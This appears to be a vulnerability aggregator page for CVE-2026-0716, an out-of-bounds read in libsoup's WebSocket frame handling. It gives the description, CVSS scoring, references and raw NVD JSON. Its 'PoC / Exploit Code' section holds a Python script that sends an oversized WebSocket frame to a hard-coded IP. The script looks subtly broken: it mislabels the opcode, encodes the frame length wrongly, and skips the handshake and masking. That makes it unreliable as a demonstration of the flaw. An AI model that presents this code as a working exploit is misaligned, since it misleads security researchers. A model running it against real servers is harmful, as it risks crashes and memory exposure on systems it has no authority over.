CVE-2026-0716

Description

A flaw was found in libsoup’s WebSocket frame processing when handling incoming messages. If a non-default configuration is used where the maximum incoming payload size is unset, the library may read memory outside the intended bounds. This can cause unintended memory exposure or a crash. Applications using libsoup’s WebSocket support with this configuration may be impacted.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

libsoup < 2.74.0

libsoup 2.74.0 - 2.74.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

def exploit(target_ip, target_port):
    # 构造恶意WebSocket帧
    payload = b'A' * 10000  # 超长payload触发越界读取
    frame = struct.pack('>B', 0x82)  # FIN + Text frame
    frame += struct.pack('>Q', len(payload))[1:]  # Length
    frame += payload
    
    # 发送恶意帧
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    sock.send(frame)
    sock.close()

if __name__ == "__main__":
    exploit("192.168.1.100", 8080)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0716
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0716
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0716/
[4] VulDB https://vuldb.com/cve/CVE-2026-0716
[5] https://access.redhat.com/security/cve/CVE-2026-0716
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2427896
[7] https://gitlab.gnome.org/GNOME/libsoup/-/issues/476

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0716", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:04.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libsoup’s WebSocket frame processing when handling incoming messages. If a non-default configuration is used where the maximum incoming payload size is unset, the library may read memory outside the intended bounds. This can cause unintended memory exposure or a crash. Applications using libsoup’s WebSocket support with this configuration may be impacted."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en el procesamiento de tramas WebSocket de libsoup al manejar mensajes entrantes. Si se utiliza una configuración no predeterminada donde el tamaño máximo de la carga útil entrante no está establecido, la biblioteca puede leer memoria fuera de los límites previstos. Esto puede causar una exposición de memoria no intencionada o un bloqueo. Las aplicaciones que utilizan el soporte WebSocket de libsoup con esta configuración pueden verse afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-0716", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427896", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/476", "source": "[email protected]"}]}}